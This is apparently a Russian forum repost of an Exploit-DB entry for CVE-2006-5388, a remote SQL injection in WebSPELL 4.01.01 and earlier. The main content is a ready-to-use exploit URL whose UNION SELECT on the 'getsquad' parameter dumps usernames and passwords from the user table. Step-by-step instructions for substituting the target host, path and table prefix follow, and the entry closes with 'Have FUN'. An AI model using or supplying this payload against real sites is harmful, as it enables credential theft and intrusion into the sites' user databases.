- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2568
- Проверка EDB
-
- Пройдено
- Автор
- KIBA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5388
- Дата публикации
- 2006-10-15
Код:
# WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
# by: Kiba
#EXPLOIT:
http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/*
#REPLACE:
(if the website is http://yourwebsite.de/webspell/index.php)
[PAGE] with "yourwebsite.de"
[PATH] with "webspell" (if there is no subdirectory then remove it)
[PREFIX] the Prefix of the database tables (try "webs_user")
# Have FUN
# milw0rm.com [2006-10-15]- Источник
- www.exploit-db.com
